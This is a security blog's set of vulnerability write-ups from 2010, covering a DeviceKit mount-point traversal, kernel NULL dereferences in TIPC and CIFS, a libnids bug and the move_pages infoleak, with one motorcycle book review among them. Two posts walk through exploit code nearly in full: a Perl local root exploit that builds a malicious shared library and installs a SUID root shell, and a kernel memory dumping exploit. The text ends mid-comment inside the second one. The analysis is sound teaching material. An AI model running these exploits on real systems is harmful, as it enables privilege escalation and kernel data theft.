CVE-2010-0746: DeviceKit Local Privilege Escalation

•April 6, 2010

Vincent Danen of Red Hat reported an old bug in DeviceKit to the oss-security mailing list. A few hours later, stealth wrote an exploit for this vulnerability to demonstrate its security implications, as we can read on his Twitter. The bug was originally reported by Pierre Ossman as an ordinary bug: DeviceKit failed to mount discs with a ‘/’ character in their filenames. To fix this design flaw, the following patch was applied to src/devkit-disks-device.c:

 	} else if (device->priv->id_uuid != NULL && strlen (device->priv->id_uuid) > 0) {
- 		mount_point = g_build_filename ("/media", device->priv->id_uuid, NULL);
+
+ 		GString *s;
+
+ 		s = g_string_new ("/media/");
+ 		for (n = 0; device->priv->id_uuid[n] != '\0'; n++) {
+ 			gint c = device->priv->id_uuid[n];
+ 			if (c == '/')
+ 				g_string_append_c (s, '_');
+ 			else
+ 				g_string_append_c (s, c);
+ 		}
+
+ 		mount_point = g_string_free (s, FALSE);
+
 	} else {

This was applied to the devkit_disks_device_filesystem_mount_authorized_cb() routine. As you can see, ‘mount_point’ is no longer initialized with g_build_filename(), which concatenates the string “/media” and the device’s UUID. Instead, a new string ‘s’ is initialized to “/media/” using g_string_new() and each character of the UUID is checked against the ‘/’ character. If a slash is found, an underscore is appended in its place; any other character is appended unchanged. The resulting string is later used as the ‘mount_point’.
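
To make the effect of the patch concrete, here is a minimal sketch of the same replacement loop in plain C, without GLib. The build_mount_point() helper and its buffer-based interface are my own assumptions for illustration and are not part of DeviceKit:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not part of DeviceKit): builds "/media/<id>" into
 * out, replacing every '/' in id with '_'. Returns 0 on success, -1 if
 * the result does not fit into outlen bytes. */
int build_mount_point(const char *id, char *out, size_t outlen)
{
	static const char prefix[] = "/media/";
	size_t plen = sizeof(prefix) - 1;
	size_t n;

	assert(id != NULL && out != NULL);
	if (plen + strlen(id) + 1 > outlen)
		return -1;

	memcpy(out, prefix, plen);
	for (n = 0; id[n] != '\0'; n++)
		out[plen + n] = (id[n] == '/') ? '_' : id[n];
	out[plen + n] = '\0';
	return 0;
}
```

With this, a name such as ‘../lib64/x86_64/’ maps to ‘/media/.._lib64_x86_64_’ and stays inside /media.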
The security implications aren’t easy to see at first, but stealth wrote an exploit named ‘devshit.pl’, which is available here and demonstrates them by spawning a root shell. To achieve successful exploitation with this code, read stealth’s comments at the beginning of it. Here is a quick overview of his work…

sub usage
{
	print "Usage: $0 </dev/HDD-to-make-evil>\n";
	exit;
}

my $hdd = shift or usage();

Quite obviously, ‘$hdd’ is the script’s argument, a device file under the /dev/ directory. If it is not given, usage() is invoked. Let’s move on…

system("mkfs.ext2 -L ../lib64/x86_64/ $hdd");
system("mkdir /M ||true;mount $hdd /M");
open(O,">/tmp/boomlib.c") or die $!;
print O<<EOF;

The given ‘$hdd’ is formatted with an EXT2 filesystem and its volume label is set to ‘../lib64/x86_64/’ (read stealth’s comments to understand this) using the ‘-L’ option of mkfs.ext2. Next, a new directory named ‘/M’ is created if it doesn’t exist and ‘$hdd’ is mounted on it. Finally, the /tmp/boomlib.c file is opened for writing and the following code is written to it:

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>

int volume_id_log_fn = 0;
void volume_id_get_type_version() { volume_id_log_fn = 1; exit(0); }
void volume_id_get_usage() { volume_id_get_type_version(); }
void volume_id_get_label_raw() { volume_id_get_usage(); }
void volume_id_get_label() { volume_id_get_label_raw(); }
void volume_id_all_probers() { volume_id_get_label(); }
void volume_id_encode_string() { volume_id_all_probers(); }
void volume_id_close() { volume_id_encode_string(); }
void volume_id_probe_filesystem() { volume_id_close(); }
void volume_id_probe_raid() { volume_id_probe_filesystem(); }
void volume_id_get_uuid_sub() { volume_id_probe_raid(); }
void volume_id_open_fd() { volume_id_get_uuid_sub(); }
void volume_id_get_type() { volume_id_open_fd(); }
void volume_id_get_uuid() { volume_id_get_type(); }
void volume_id_get_prober_by_type() { volume_id_get_uuid(); }
void volume_id_probe_all() { volume_id_get_prober_by_type(); }

As you can see, this is a chain of functions that all end up calling the first one, volume_id_get_type_version(). They are there simply so that the library provides these symbols and can intercept the calls coming from HAL. The code continues like this:

void _init()
{
	int fd1, fd2, r;
	char buf[32000];
	fd1 = open("/lib64/x86_64/boomsh", O_RDONLY);
	fd2 = open("/var/tmp/boomsh", O_RDWR|O_CREAT, 0600);
	if (fd1 < 0 || fd2 < 0)
		return;
	r = read(fd1, buf, sizeof(buf));
	write(fd2, buf, r);
	close(fd1); close(fd2);

	chown("/var/tmp/boomsh",0,0);chmod("/var/tmp/boomsh", 04755);
	volume_id_probe_all();
}

This is the initialization function of the library. It opens ‘/lib64/x86_64/boomsh’, opens or creates ‘/var/tmp/boomsh’, copies the contents of the former into the latter (up to the 32000 bytes that fit in ‘buf’) and turns the copy into a root-owned SUID executable. Finally, it calls volume_id_probe_all(). The aim of this library is to be loaded instead of the legitimate ‘libvolume_id’ since, as stealth noted, the dynamic linker looks in ‘/lib64/x86_64/’ under Fedora Core 11 x86_64, and this can be abused.
The Perl exploit then moves on like this:

EOF
close(O);
system("cc -c -fPIC /tmp/boomlib.c -o /tmp/boomlib.o");
system("ld -shared -soname=libvolume_id.so.1 /tmp/boomlib.o -o /M/libvolume_id.so.1");
unlink("/tmp/boomlib.c"); unlink("/tmp/boomlib.o");

It compiles the previous C code into a shared library named ‘libvolume_id.so.1’, which is placed on the mounted volume under ‘/M’. Next, a new file is created…

open(O,">/tmp/boomsh.c") or die $!;
print O<<EOF;

As you might imagine, ‘/tmp/boomsh.c’ is the code of the SUID root program that spawns a Bash shell.

#include <stdio.h>
int main()
{
	char *a[]={"/bin/bash", "--noprofile", "--norc", NULL};
	setuid(0); setgid(0);
	execve(*a, a, NULL);
	return -1;
}

Finally, the Perl code ends like this:

EOF
close(O);
system("gcc -s -O2 /tmp/boomsh.c -o /M/boomsh");
unlink("/tmp/boomsh.c");
system("umount /M");

The binary is compiled onto the volume as well, and the volume is unmounted. When the volume is later mounted through DeviceKit, its name ‘../lib64/x86_64/’ is appended to “/media”, so the mount point becomes ‘/media/../lib64/x86_64/’. This makes the evil library and the ‘boomsh’ binary show up under ‘/lib64/x86_64/’, even though that isn’t where the volume is supposed to be mounted. When the library is then loaded by the dynamic linker, it installs ‘boomsh’ as a SUID root shell at ‘/var/tmp/boomsh’.
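
The path arithmetic behind this can be sketched in C. The resolve_path() helper below is hypothetical and purely lexical (it ignores symlinks), so it only approximates what the kernel does when it walks the path, but it shows where a mount point built from the volume name ‘../lib64/x86_64/’ ends up:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: lexically resolves an absolute path (no symlink
 * handling), collapsing "//", "." and ".." components into out.
 * Returns 0 on success, -1 if out is too small. */
int resolve_path(const char *path, char *out, size_t outlen)
{
	size_t len = 0;              /* current length of the result in out */
	const char *p = path;

	assert(path != NULL && out != NULL && path[0] == '/');
	if (outlen < 2)
		return -1;

	while (*p != '\0') {
		const char *start;
		size_t clen;

		while (*p == '/')        /* skip separators */
			p++;
		start = p;
		while (*p != '\0' && *p != '/')
			p++;
		clen = (size_t)(p - start);

		if (clen == 0 || (clen == 1 && start[0] == '.'))
			continue;            /* empty or "." component */
		if (clen == 2 && start[0] == '.' && start[1] == '.') {
			while (len > 0 && out[--len] != '/')
				;                /* drop the last component */
			continue;
		}
		if (len + 1 + clen + 1 > outlen)
			return -1;
		out[len++] = '/';
		memcpy(out + len, start, clen);
		len += clen;
	}
	if (len == 0)
		out[len++] = '/';        /* everything collapsed to the root */
	out[len] = '\0';
	return 0;
}
```

Resolving ‘/media/../lib64/x86_64/’ this way gives ‘/lib64/x86_64’, while a name with the slashes replaced, ‘/media/.._lib64_x86_64_’, resolves to itself.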
Cool code! :)

CVE-2010-1187: Linux kernel TIPC NULL Pointer Dereference

•April 5, 2010

This vulnerability was reported by Neil Horman and it affects Linux kernel 2.6.33 and probably other releases too. The problem is in the Transparent Inter-Process Communication (TIPC) code, specifically in the code below from the net/tipc/core.c file.

static int __init tipc_init(void)
{
      ...
        if ((res = tipc_core_start()))
                err("Unable to start in single node mode\n");
      ...
        return res;
}

This is the module’s initialization routine and, as you can read, it invokes tipc_core_start() in order to start the module. Among other things, this executes the following…

/* global variables used by multiple sub-systems within TIPC */

int tipc_mode = TIPC_NOT_RUNNING;
      ...
/**
 * tipc_core_start - switch TIPC from NOT RUNNING to SINGLE NODE mode
 */

int tipc_core_start(void)
{
      ...
        get_random_bytes(&tipc_random, sizeof(tipc_random));
        tipc_mode = TIPC_NODE_MODE;
      ...
        return res;
}

So, after initializing ‘tipc_random’ with random bytes, it sets ‘tipc_mode’ to ‘TIPC_NODE_MODE’, which means that communication is allowed only within the node’s own address. This is done because the ‘tipc_net’ structure isn’t initialized yet; as we can find in net/tipc/net.c, its first member is set to NULL like this:

struct network tipc_net = { NULL };

So even though the user should not be able to send messages to any other address, there is nothing to stop him from trying. A user can simply create an ‘AF_TIPC’ socket and send a datagram before the TIPC kernel module enters its network mode. At that point the code shown below, which allocates the zone table, has not been executed yet:

static int net_init(void)
{
        memset(&tipc_net, 0, sizeof(tipc_net));
        tipc_net.zones = kcalloc(tipc_max_zones + 1, sizeof(struct _zone *), GFP_ATOMIC);
        if (!tipc_net.zones) {
                return -ENOMEM;
        }
        return 0;
}

Since ‘tipc_net.zones’ is still NULL at that point, any access to an entry of the zone table dereferences a NULL pointer, which results in a kernel OOPS. To fix this, the global ‘tipc_net’ was changed like this:

 DEFINE_RWLOCK(tipc_net_lock);
-struct network tipc_net = { NULL };
+struct _zone *tipc_zones[256] = { NULL, };
+struct network tipc_net = { tipc_zones };

This makes ‘tipc_net.zones’ point to a static array of 256 entries, all of them initialized to NULL, so the pointer itself is never NULL. In addition, there is no need for an initialization routine any more since the space is already allocated in the new static array. For this reason net_init() was removed:

-static int net_init(void)
-{
-       memset(&tipc_net, 0, sizeof(tipc_net));
-       tipc_net.zones = kcalloc(tipc_max_zones + 1, sizeof(struct _zone *), GFP_ATOMIC);
-       if (!tipc_net.zones) {
-               return -ENOMEM;
-       }
-       return 0;
-}
-

The matching net_stop() was changed to remove the NULL pointer check along with the kfree() call, like this:

 static void net_stop(void)
 {
        u32 z_num;

-       if (!tipc_net.zones)
-               return;
-
-       for (z_num = 1; z_num <= tipc_max_zones; z_num++) {
+       for (z_num = 1; z_num <= tipc_max_zones; z_num++)
                tipc_zone_delete(tipc_net.zones[z_num]);
-       }
-       kfree(tipc_net.zones);
-       tipc_net.zones = NULL;
 }

Finally, tipc_net_start() was also updated since there is no net_init() function in the module any more…


-       if ((res = tipc_bearer_init()) ||
-           (res = net_init()) ||
-           (res = tipc_cltr_init()) ||
+       if ((res = tipc_cltr_init()) ||
            (res = tipc_bclink_init())) {
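
The idea of the fix can be sketched outside the kernel as follows. The types, the MAX_ZONES value and the zone_lookup() helper are simplified stand-ins of my own, not the actual TIPC definitions:

```c
#include <assert.h>
#include <stddef.h>

#define MAX_ZONES 255            /* assumption: highest valid zone number */

struct zone { int id; };
struct network { struct zone **zones; };

/* Before the fix: the table pointer is NULL until an init routine runs. */
static struct network net_lazy = { NULL };

/* After the fix: the table is a static array, so the pointer is valid from
 * load time and every slot starts out as NULL. */
static struct zone *zone_table[MAX_ZONES + 1] = { NULL, };
static struct network net_static = { zone_table };

/* Hypothetical lookup: returns the zone for z_num, or NULL if there is
 * none. With the static table the !net->zones case can no longer occur. */
struct zone *zone_lookup(const struct network *net, unsigned int z_num)
{
	assert(net != NULL);
	if (!net->zones || z_num > MAX_ZONES)
		return NULL;
	return net->zones[z_num];
}
```

With ‘net_lazy’ every caller has to remember the NULL test, whereas with ‘net_static’ an early lookup simply finds an empty slot.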

Book: How To Repair and Maintain American V-Twin Motorcycles

•April 5, 2010

So, since my hobbies include internal combustion engines and motorcycles, I bought this book some time ago. It’s a nice book covering all of the basics of repairing and maintaining V-Twin engines. It’s written by Sara Liberte, who runs RT’s North Hills Cycle, Inc. with her boyfriend. I would suggest this book to people interested in choppers and V-Twin motorcycles in general, although it doesn’t contain anything extremely advanced. On the upside, the book is very well written and contains numerous photos demonstrating the topics covered. Here is a more detailed review of each chapter.

Title: How To Repair and Maintain American V-Twin Motorcycles
Author: Sara Liberte

Chapter 1: Know Your Bike
Here the author introduces the world of motorcycles through personal stories and continues with common topics like riding gear, parts, service manuals, bike features, parts books etc. It’s introductory, essential information that most riders already know. In any case, it is well written and the pictures make the chapter easier to read.

Chapter 2: Tool Time
In this chapter you can find information about tools, ranging from old-fashioned Phillips screwdrivers, Torx and Allen heads, ratchet wrenches etc. to more specialized ones such as torque wrenches, filter wrenches etc. The author also gives a simple description of the sizes of each tool along with personal suggestions. Apart from the standard tools used in most cases, it covers some specialty tools for both mechanical and electrical problems that someone could face on a V-Twin motorcycle. Finally, it discusses safety measures as well as the importance of using the appropriate tools along with the service manual.

Chapter 3: Drop That Fluid
This is the first chapter with projects: seven of them, all about changing fluids in a motorcycle, from simple ones such as changing the oil and the oil filter to more advanced ones like upgrading the oil pump for a performance gain. Everything discussed in the text is also shown step by step in photos.

Chapter 4: Service Intervals
This is the largest chapter, with twelve mechanical projects ranging from beginner to advanced level. Once again everything is explained in both text and pictures. The projects range from simple ones like changing and reading spark plugs to more advanced ones such as upgrading the wheel’s rotor and caliper for performance.

Chapter 5: Electrical 101
As you can imagine, this chapter deals with the electrical system of a V-Twin American motorcycle. This includes batteries, charging system etc. Two more projects regarding these topics are included here too.

Chapter 6: Simple Roadside Repairs and Travel Toolkits
This is a tiny chapter that gives some hints for common road-side repairs that a rider might need to perform as well as some suggestions for the right toolkits for such situations.

Linux kernel UNIX Extensions CIFS NULL Pointer Dereference

•April 5, 2010

A few days ago Eugene Teo reported a vulnerability in the Linux kernel’s CIFS code to the linux-cifs-client mailing list. If we have a quick look at fs/cifs/dir.c in the 2.6.32 release of the Linux kernel, we can read the following.

/* Inode operations in similar order to how they appear in Linux file fs.h */

int
cifs_create(struct inode *inode, struct dentry *direntry, int mode,
                struct nameidata *nd)
      ...
        if (tcon->unix_ext && (tcon->ses->capabilities & CAP_UNIX) &&
            (CIFS_UNIX_POSIX_PATH_OPS_CAP &
                        le64_to_cpu(tcon->fsUnixInfo.Capability))) {
                rc = cifs_posix_open(full_path, &newinode, nd->path.mnt,
                                     mode, oflags, &oplock, &fileHandle, xid);
      ...
        return rc;
}

This routine is used to create a CIFS entry. The above snippet first checks that ‘tcon->unix_ext’ (a Boolean flag for the UNIX extensions to the CIFS protocol) is set and then performs a capabilities check using the session’s stored capabilities (through ‘tcon->ses->capabilities’) as well as the capabilities of the UNIX extensions filesystem (using ‘tcon->fsUnixInfo.Capability’). Finally, it calls cifs_posix_open() of fs/cifs/dir.c. As Eugene Teo noted, however, cifs_create() doesn’t perform any check to ensure that the ‘nameidata’ pointer ‘nd’ is valid. Because of this, if a file is created with UNIX extensions support and the caller doesn’t provide any ‘nameidata’, ‘nd’ is NULL and evaluating the ‘nd->path.mnt’ argument of the cifs_posix_open() call shown above, which obtains the VFS mount information for that file, results in a NULL pointer dereference. Here is how cifs_posix_open() uses the VFS mount structure (its 3rd argument):

int cifs_posix_open(char *full_path, struct inode **pinode,
                    struct vfsmount *mnt, int mode, int oflags,
                    __u32 *poplock, __u16 *pnetfid, int xid)
{
      ...
        struct cifs_sb_info *cifs_sb = CIFS_SB(mnt->mnt_sb);
      ...
        rc = CIFSPOSIXCreate(xid, cifs_sb->tcon, posix_flags, mode,
                        pnetfid, presp_data, poplock, full_path,
                        cifs_sb->local_nls, cifs_sb->mnt_cifs_flags &
                                        CIFS_MOUNT_MAP_SPECIAL_CHR);
      ...
        cifs_unix_basic_to_fattr(&fattr, presp_data, cifs_sb);

        /* get new inode and set it up */
        if (*pinode == NULL) {
                *pinode = cifs_iget(mnt->mnt_sb, &fattr);
      ...
        cifs_new_fileinfo(*pinode, *pnetfid, NULL, mnt, oflags);
      ...
        return rc;
}

Even though I haven’t tested anything yet, I think that it could lead to exploitable conditions since the pointer is used by numerous functions that could be used to manipulate data from kernel space, assuming that you can map the required pages to avoid the crash. The vulnerability was patched simply like this:

 		oflags = FMODE_READ;

-	if (tcon->unix_ext && (tcon->ses->capabilities & CAP_UNIX) &&
+	if (nd && tcon->unix_ext && (tcon->ses->capabilities & CAP_UNIX) &&
 	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
 			le64_to_cpu(tcon->fsUnixInfo.Capability))) {
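
Since ‘nd’ is now the first operand of the ‘&&’ chain, the branch that evaluates ‘nd->path.mnt’ is simply skipped when ‘nd’ is NULL. A minimal sketch of that ordering, with simplified stand-in structures and a hypothetical posix_open_mount() helper rather than the real CIFS code:

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-ins for the kernel structures, for illustration only. */
struct vfsmount { int id; };
struct path { struct vfsmount *mnt; };
struct nameidata { struct path path; };
struct tcon { int unix_ext; };

/* Hypothetical helper: returns the mount to hand to the POSIX open path,
 * or NULL when that path must be skipped. */
struct vfsmount *posix_open_mount(const struct tcon *tcon,
				  const struct nameidata *nd)
{
	assert(tcon != NULL);        /* the sketch assumes a valid tcon */

	/* nd is tested first, so nd->path.mnt is only read when nd is valid */
	if (nd && tcon->unix_ext)
		return nd->path.mnt;
	return NULL;
}
```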

Libnids IP Fragmentation Remote NULL Pointer Dereference

•April 4, 2010

The designer of the popular libnids library, Rafal Wojtczuk (also known as nergal), discovered this vulnerability, as we can read in the release notes of version 1.24 of the library, available here. As the release notes state, the vulnerability is located in src/ip_fragment.c, and here is the equivalent code from version 1.23 of the library…

/*
  Memory limiting on fragments. Evictor trashes the oldest fragment
  queue until we are back under the low threshold.
*/
static void
ip_evictor(void)
{
  // fprintf(stderr, "ip_evict:numpack=%i\n", numpack);
  while (this_host->ip_frag_mem > IPFRAG_LOW_THRESH) {
    if (!this_host->ipqueue)
      panic("ip_evictor: memcount");
    ip_free(this_host->ipqueue);
  }
}

You can read the aim of this routine in its comment. The ‘while’ loop iterates as long as the integer ‘ip_frag_mem’ is larger than ‘IPFRAG_LOW_THRESH’, which is defined in the same source file like this:

/*
  Fragment cache limits. We will commit 256K at one time. Should we
  cross that limit we will prune down to 192K. This should cope with
  even the most extreme cases without allowing an attacker to
  measurably harm machine performance.
*/
#define IPFRAG_HIGH_THRESH		(256*1024)
#define IPFRAG_LOW_THRESH		(192*1024)

Next, if ‘this_host->ipqueue’, which describes an entry in the “incomplete datagrams” queue, is NULL, it immediately calls panic(). Otherwise, it invokes ip_free() on this queue entry. However, the ‘this_host’ pointer, which keeps the fragments for this host, might be NULL, and then the access to the ‘ip_frag_mem’ integer is a NULL pointer dereference, which could later result in exploitable situations in the ip_free() function. This was patched like this:

   // fprintf(stderr, "ip_evict:numpack=%i\n", numpack);
-  while (this_host->ip_frag_mem > IPFRAG_LOW_THRESH) {
+  while (this_host && this_host->ip_frag_mem > IPFRAG_LOW_THRESH) {
     if (!this_host->ipqueue)
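
The guarded loop can be sketched in isolation like this. The structures are reduced to the fields the loop touches, LOW_THRESH is an arbitrary small value and evict() is a hypothetical stand-in for ip_evictor(), not the libnids code:

```c
#include <assert.h>
#include <stddef.h>

#define LOW_THRESH 4             /* stand-in for IPFRAG_LOW_THRESH */

struct queue { struct queue *next; int size; };
struct host { struct queue *ipqueue; int ip_frag_mem; };

/* Drops queue entries until memory use is at or below LOW_THRESH.
 * Returns the number of entries dropped; a NULL host drops nothing. */
int evict(struct host *h)
{
	int dropped = 0;

	/* h is tested first, so h->ip_frag_mem is never read through NULL */
	while (h && h->ip_frag_mem > LOW_THRESH) {
		struct queue *q = h->ipqueue;

		assert(q != NULL);       /* the original calls panic() here */
		h->ipqueue = q->next;
		h->ip_frag_mem -= q->size;
		dropped++;
	}
	return dropped;
}
```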

CVE-2010-0415: Linux kernel move_pages(2) Information Leak

•February 25, 2010

So, this quite interesting vulnerability was discovered by Ramon de Carvalho Valle of IBM (aka. ramon of Rise Security), as we can read in this bug report by Eugene Teo of Red Hat. The bug affects Linux kernels prior to 2.6.33-rc7 and it is located in the code of the move_pages(2) system call. As we can read in its man page, this system call is used to move a number of memory pages to a different NUMA node, or to determine the nodes on which those pages reside. Now, let’s have a look at the vulnerability.
The code for this system call resides in mm/migrate.c and here is the relevant code snippet from the 2.6.32 release of the Linux kernel.

/*
 * Move a list of pages in the address space of the currently executing
 * process.
 */
SYSCALL_DEFINE6(move_pages, pid_t, pid, unsigned long, nr_pages,
                const void __user * __user *, pages,
                const int __user *, nodes,
                int __user *, status, int, flags)
{
        const struct cred *cred = current_cred(), *tcred;
        struct task_struct *task;
        struct mm_struct *mm;
        int err;
    ...
        if (nodes) {
                err = do_pages_move(mm, task, nr_pages, pages, nodes, status,
                                    flags);
        } else {
                err = do_pages_stat(mm, nr_pages, pages, status);
        }
    ...
}

So, ‘nodes’ is a user-controlled pointer that determines what this system call will do. Unless it’s NULL, do_pages_move() is called, as you can read in the provided code snippet. Let’s move to this routine now…

/*
 * Migrate an array of page address onto an array of nodes and fill
 * the corresponding array of status.
 */
static int do_pages_move(struct mm_struct *mm, struct task_struct *task,
                         unsigned long nr_pages,
                         const void __user * __user *pages,
                         const int __user *nodes,
                         int __user *status, int flags)
{
        struct page_to_node *pm;
        nodemask_t task_nodes;
        unsigned long chunk_nr_pages;
        unsigned long chunk_start;
        int err;
    ...
        /*
         * Store a chunk of page_to_node array in a page,
         * but keep the last one as a marker
         */
        chunk_nr_pages = (PAGE_SIZE / sizeof(struct page_to_node)) - 1;

        for (chunk_start = 0;
             chunk_start < nr_pages;
             chunk_start += chunk_nr_pages) {
    ...
                /* fill the chunk pm with addrs and nodes from user-space */
                for (j = 0; j < chunk_nr_pages; j++) {
                        const void __user *p;
                        int node;
    ...
                        if (get_user(node, nodes + j + chunk_start))
                                goto out_pm;

                        err = -ENODEV;
                        if (!node_state(node, N_HIGH_MEMORY))
                                goto out_pm;

                        err = -EACCES;
                        if (!node_isset(node, task_nodes))
                                goto out_pm;

                        pm[j].node = node;

                }

                /* End marker for this chunk */
                pm[chunk_nr_pages].node = MAX_NUMNODES;
    ...
                /* Return status information */
                for (j = 0; j < chunk_nr_pages; j++)
                        if (put_user(pm[j].status, status + j + chunk_start)) {
                                err = -EFAULT;
                                goto out_pm;
                        }
        }
        err = 0;

out_pm:
        free_page((unsigned long)pm);
out:
        return err;
}

In the above code you can read that the function enters a ‘for’ loop over the chunks and then another one that fills the list of pages with data obtained from user space. It’s clear that it uses get_user() to obtain the node’s value directly from user space and uses it later on without performing any range checks. The subsequent calls to node_state() and node_isset() result in the execution of the following code, located in include/linux/nodemask.h:

extern nodemask_t node_states[NR_NODE_STATES];

#if MAX_NUMNODES > 1
static inline int node_state(int node, enum node_states state)
{
        return node_isset(node, node_states[state]);
}

and…

/* No static inline type checking - see Subtlety (1) above. */
#define node_isset(node, nodemask) test_bit((node), (nodemask).bits)

respectively, and as Eugene Teo noted in his comment:

(The node_isset and node_state functions just map to test_bit, which has no
limiter in the normal implementations.)

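Thus the user can request any node value, and test_bit() will read a bit at whatever offset from the node bitmap that value selects. Whether the call then fails with ‘ENODEV’ or not tells the caller whether that bit is set, which is what the exploit discussed below relies on. In addition, the arbitrary value is stored as the node of the ‘pm[]’ entry, whose status is later returned to user space through put_user() in a ‘for’ loop, as you can read in the code of do_pages_move() shown earlier. Obviously, this can result in an information leak of kernel memory, and it was fixed by applying the following patch: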

                        err = -ENODEV;
+                       if (node < 0 || node >= MAX_NUMNODES)
+                               goto out_pm;
+
                        if (!node_state(node, N_HIGH_MEMORY))

This checks that the signed integer ‘node’ is not negative and is below the constant ‘MAX_NUMNODES’, which is defined in include/linux/numa.h like this:

#ifdef CONFIG_NODES_SHIFT
#define NODES_SHIFT     CONFIG_NODES_SHIFT
#else
#define NODES_SHIFT     0
#endif

#define MAX_NUMNODES    (1 << NODES_SHIFT)

#endif /* _LINUX_NUMA_H */
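
The effect of the missing range check can be reproduced safely in user space. In the sketch below, the memory layout, MAX_NODES and both helper functions are assumptions made for illustration; the point is only that an index past the end of the bitmap reads neighbouring data, and that a check like the one in the patch stops it:

```c
#include <assert.h>
#include <limits.h>

#define MAX_NODES 64             /* stand-in for MAX_NUMNODES */

/* Assumed layout for this sketch: an 8-byte node bitmap followed directly
 * by unrelated data, all inside one buffer so that the out-of-range read
 * stays well-defined in user space. */
static unsigned char memory[16] = {
	0x01, 0, 0, 0, 0, 0, 0, 0,       /* bitmap: only node 0 is set */
	0, 0, 0, 0, 0xA5, 0, 0, 0        /* neighbouring data, "secret" at [12] */
};

/* Unchecked bit test in the spirit of test_bit(): no upper limit on nr.
 * Negative indexes are left out of this sketch. */
int test_bit_unchecked(int nr, const unsigned char *bits)
{
	assert(nr >= 0);
	return (bits[nr / CHAR_BIT] >> (nr % CHAR_BIT)) & 1;
}

/* The same test with a range check in front of it, as in the patch. */
int node_is_set(int node, const unsigned char *bits)
{
	if (node < 0 || node >= MAX_NODES)
		return 0;
	return test_bit_unchecked(node, bits);
}
```

Here test_bit_unchecked(12 * 8, memory) returns the lowest bit of the byte at memory[12], while node_is_set() rejects the same index.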

Finally, let’s move to the more interesting part of the post. The exploitation…
Brad Spengler of grsecurity (aka. spender) wrote and published exploit code for this vulnerability, named “exp_sieve.c”, which is available for download here. He also provides some background information on how ramon discovered the vulnerability using his ‘flail’ fuzzer, as well as some useful exploitation notes. So…

#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"

#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)

int max_numnodes;

unsigned long node_online_map;

unsigned long node_states;

unsigned long our_base;
unsigned long totalhigh_pages;

#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
      ...
struct exploit_state *exp_state;

char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";

int get_exploit_state_ptr(struct exploit_state *ptr)
{
	exp_state = ptr;
	return 0;
}

int requires_null_page = 0;

As you can see, he uses his exploitation framework (known as enlightenment) in this exploit too. If you’re not familiar with this framework, you can just read the ‘exp_framework.h’ header file, which has sufficient comments to outline the functions and structures required to use its API. For example, get_exploit_state_ptr() should be implemented in order to get access to the ‘exp_state’ structure, as you can see above. Next, there are some helper functions…

void addr_to_nodes(unsigned long addr, int *nodes)
{
	int i;
	int min = 0x80000000 / 8;
	int max = 0x7fffffff / 8; 

	if ((addr < (our_base - min)) ||
	    (addr > (our_base + max))) {
		fprintf(stdout, "Error: Unable to dump address %p\n", addr);
		exit(1);
	}

	for (i = 0; i < 8; i++) {
		nodes[i] = ((int)(addr - our_base) << 3) | i;
	}

	return;
}

This function fills the ‘nodes’ array for the given address. After checking that the address is within reach of ‘our_base’, it computes eight node values, one for each bit of the byte at that address, which are later used to leak kernel data. The next one is:

char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
	int nodes[8];
	int node;
	int status;
	int i;
	int ret;
	unsigned char tmp = 0;

	addr_to_nodes(addr, (int *)&nodes);
	for (i = 0; i < 8; i++) {
		node = nodes[i];
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno != ENODEV)
			tmp |= (1 << i);
	}

	return tmp;
}

This is the actual “exploitation” function. It initializes the ‘nodes[]’ array using the previous function for the address given in ‘addr’. Then, for each of the eight node values, it calls the buggy system call and checks the error number to determine whether the system call is available on the system. If the call did not fail with the ‘ENODEV’ (aka. “No such device”) error code, the probed bit is set, so the corresponding bit of the return value is set too.
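
The way eight one-bit answers are turned back into a byte can be sketched as follows. Here bit_is_set() is a stand-in for the move_pages(2) probe (where a result other than ‘ENODEV’ means the bit is set), and read_byte_via_bits() is a hypothetical user-space equivalent of get_byte_at_addr() working on an ordinary buffer:

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

/* Bit oracle for the sketch: answers whether bit nr, counted from base,
 * is set. In the exploit this answer comes from the error code of the
 * system call instead of a direct memory read. */
static int bit_is_set(const unsigned char *base, long nr)
{
	return (base[nr / CHAR_BIT] >> (nr % CHAR_BIT)) & 1;
}

/* Rebuilds the byte at base + offset from eight one-bit probes, using the
 * same index arithmetic as addr_to_nodes(): (offset << 3) | i. */
unsigned char read_byte_via_bits(const unsigned char *base, long offset)
{
	unsigned char value = 0;
	int i;

	assert(base != NULL && offset >= 0);
	for (i = 0; i < 8; i++) {
		long nr = (offset << 3) | i;

		if (bit_is_set(base, nr))
			value |= (unsigned char)(1u << i);
	}
	return value;
}
```

Each byte therefore costs eight probes, which is why dumping a large range takes a while.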
The next routine is part of the enlightenment framework too. It’s the menu of the exploit, which is pretty simple as you can see here:

void menu(void)
{
	fprintf(stdout, "Enter your choice:\n"
			" [0] Dump via symbol/address with length\n"
			" [1] Dump entire range to file\n"
			" [2] Quit\n");
}

Even though the next routine in the exploit code is the trigger function, we’ll skip it for now and look at the preparation one first. Here is the pre-exploitation function…

int prepare(unsigned char *ptr)
{
	int node;
	int found_gap = 0;
	int i;
	int ret;
	int status;

	totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
	node_states = exp_state->get_kernel_sym("node_states");
	node_online_map = exp_state->get_kernel_sym("node_online_map");

It uses the callback functions of the framework to retrieve some kernel symbol addresses. In this case these are ‘totalhigh_pages’, which is part of the ‘CONFIG_HIGHMEM’ option and normally contains the total number of high pages, ‘node_states’, which is the array of node bitmaps (one per node state) shown earlier, and ‘node_online_map’, which is the bitmap for ‘N_ONLINE’ (this one stands for “the node is online”).

	buf = malloc(4096);

	/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
